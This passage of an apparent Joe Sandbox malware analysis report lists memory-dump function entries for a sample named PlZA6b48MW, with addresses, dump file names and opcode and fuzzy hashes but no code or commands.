                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction ID: 6a00049e8ca182c2eb4530ae5ea2728430e17252d36e448b6e55ee6a9536c2e8
                                                                            • Opcode Fuzzy Hash: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction Fuzzy Hash: 1FC08C30551C0C8FC908FB68C89481433A0FB0D300BC20090E008C71B0D229DCD1C740
                                                                            Function 00007FFD9BC7166B Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction ID: e6ec95863f5a116235c0dc407916e0ca9875e18f9404ecf3f4868e48f313a05c
                                                                            • Opcode Fuzzy Hash: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction Fuzzy Hash: 30D09210B0F54F89F2399AF280B023D15A4DF05700F2B007AC05F428E1C92CBA016622
                                                                            Function 00007FFD9B881E15 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0fbb08f9b1545476acc526f038291c94ebffb6765927ee3013bcd2b54e57c4c0
                                                                            • Instruction ID: 39b6b79f1dca591f829d92b9ddcad5a9ccc479f91294aa6dfeb0c23adb5e5155
                                                                            • Opcode Fuzzy Hash: 0fbb08f9b1545476acc526f038291c94ebffb6765927ee3013bcd2b54e57c4c0
                                                                            • Instruction Fuzzy Hash: D4C04C01F1DD5E47F359A618C5715BE45539F98798FD50074E06DC72CEDD2D5E020287
                                                                            Function 00007FFD9B880540 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: 444b06883d6403d80a20305b353aa5c2b492d5e88afe7384271677b11c4a0f03
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: AEB09220D6BA0F43DA3833B10892864B050AB4D204FD202B4D419401A1A97F52958282
                                                                            Function 00007FFD9BC75B8F Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction ID: 5b5a45411e3b3dde6cf8ada331a62a90ab5dff33513680961b63b7a34f1f16ba
                                                                            • Opcode Fuzzy Hash: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction Fuzzy Hash: 90C04884F0E28B6AEA3526F009E907E0690AF6A200B560972D10A8A1E3E85D7A095261
                                                                            Function 00007FFD9B8C41D8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 580a036e675e5ff736294f20224ca1d38cf199f687b6932c8888eaf75ae66f43
                                                                            • Instruction ID: 760d70ae334dad61988b0fbdaa459ca790e9fc8ae6c86c8706d0ec9d931fb0eb
                                                                            • Opcode Fuzzy Hash: 580a036e675e5ff736294f20224ca1d38cf199f687b6932c8888eaf75ae66f43
                                                                            • Instruction Fuzzy Hash: A2B00244D9740B01E61436B91D9647474506B49114FD61571DC19801DF984D56D51153
                                                                            Function 00007FFD9B8C41D0 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ee0edc505dde9307d762e6b23f13fc519b81e9609b12cd231874ceba8c996bd
                                                                            • Instruction ID: bc9c38c068a0e8f7ba24b4741a0f10bfe412cb51eac0928afce2039f627f3970
                                                                            • Opcode Fuzzy Hash: 7ee0edc505dde9307d762e6b23f13fc519b81e9609b12cd231874ceba8c996bd
                                                                            • Instruction Fuzzy Hash: 60B01240D6785E02D92833F619530B470005B4C110FC710B5F40C40191984E13E81246
                                                                            Function 00007FFD9B8C5909 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bae772cbbded3ad12869568cf8863263d757e8801d3c8ad6ea14d53e4bdbffd8
                                                                            • Instruction ID: e171a0cce2bcaf2be9be95829a1135e93d0544488e58ba4dc171a41986d72666
                                                                            • Opcode Fuzzy Hash: bae772cbbded3ad12869568cf8863263d757e8801d3c8ad6ea14d53e4bdbffd8
                                                                            • Instruction Fuzzy Hash: FBB01210DCB80F03CE187EFBADD60A031109F4C308FCA1074E80C40156D84D21F50366
                                                                            Function 00007FFD9B8837E4 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: 105df88bc064afe158920e2b52b50a2a3bd25cc092415d7a1fa889fc1ff5f02b
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: C6B02200EAA80C03E330ABB088202BE32000F0C208F0B80BA802AA3083CE382A020A00
                                                                            Function 00007FFD9B880520 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 7c69805296b747c8bb6619effc5133634486393f796e516f843f39d7a1b03565
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 8FB01204D7BC0E02E42433F50B5A06470405B4D510FD21470D41940095985F1AA40182
                                                                            Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: bb31b72b98842f8e3b33be80a82a97bc21048ba867448af131269b9e260de9e6
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: 98B01200D67C0F02E42433FB0C52064B0446F8C200FCB0170D42D501A1A85E12950282

                                                                            Non-executed Functions

                                                                            Function 00007FFD9B8C06F2 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-1300261669
                                                                            • Opcode ID: ac7efce2cd0df8a8bcbc83ab0d4fee5962960e7eee51d9071b3fce96e08766e4
                                                                            • Instruction ID: c317cbb46bf3d878b61919fa9d1578fb0ab0b80541fb70a2340494232f83a5db
                                                                            • Opcode Fuzzy Hash: ac7efce2cd0df8a8bcbc83ab0d4fee5962960e7eee51d9071b3fce96e08766e4
                                                                            • Instruction Fuzzy Hash: FE4174B2B0E65A8FE79AEBAC98E15F537E0FF4425871502FBC04CCB197EC15A5428740